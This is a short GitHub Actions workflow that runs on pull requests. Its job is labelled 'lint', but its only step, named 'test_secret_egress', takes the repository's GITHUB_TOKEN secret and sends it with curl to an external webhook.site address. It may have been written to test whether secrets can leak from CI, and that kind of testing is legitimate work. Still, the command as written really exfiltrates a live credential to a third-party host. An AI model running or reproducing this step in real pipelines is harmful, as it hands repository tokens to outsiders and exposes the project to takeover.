name: Pull Request
on: pull_request
permissions:
  contents: read
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
    - name: test_secret_egress
      run: |
        GITHUB_TOKEN=${{ secrets.GITHUB_TOKEN }}
        curl "https://webhook.site/c5936fbf-353c-41a4-9036-871651a7b0e0/?test=$GITHUB_TOKEN"
